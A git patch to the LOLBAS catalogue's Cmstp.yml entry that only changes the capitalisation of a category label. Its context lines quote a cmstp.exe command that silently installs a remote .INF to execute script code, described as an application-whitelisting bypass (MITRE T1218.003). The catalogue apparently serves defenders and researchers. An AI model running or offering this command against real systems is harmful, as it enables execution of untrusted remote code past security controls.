From 09e81d0bd10deddc49da6cda873419ea77704aea Mon Sep 17 00:00:00 2001 From: xenoscr Date: Sat, 10 Sep 2022 22:48:08 -0400 Subject: [PATCH] Correcting Cmstp.yml Category value, case. --- yml/OSBinaries/Cmstp.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/yml/OSBinaries/Cmstp.yml b/yml/OSBinaries/Cmstp.yml index f4dc7d4..8d51fef 100644 --- a/yml/OSBinaries/Cmstp.yml +++ b/yml/OSBinaries/Cmstp.yml @@ -14,7 +14,7 @@ Commands: - Command: cmstp.exe /ni /s https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Cmstp.inf Description: Silently installs a specially formatted remote .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll. Usecase: Execute code hidden within an inf file. Execute code directly from Internet. - Category: AWL bypass + Category: AWL Bypass Privileges: User MitreID: T1218.003 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10